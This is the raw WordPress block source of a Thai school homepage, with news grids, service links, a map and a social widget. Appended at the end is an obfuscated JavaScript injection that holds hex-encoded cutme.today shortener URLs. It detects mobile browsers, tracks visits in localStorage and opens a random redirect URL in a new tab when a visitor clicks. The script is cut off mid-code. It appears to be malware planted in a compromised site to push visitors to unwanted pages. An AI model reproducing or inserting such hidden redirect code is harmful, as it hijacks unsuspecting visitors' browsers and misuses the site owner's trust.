/-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"6fd1fd-18\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab6fd1fd-18\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"281735-c8\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab281735-c8\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new 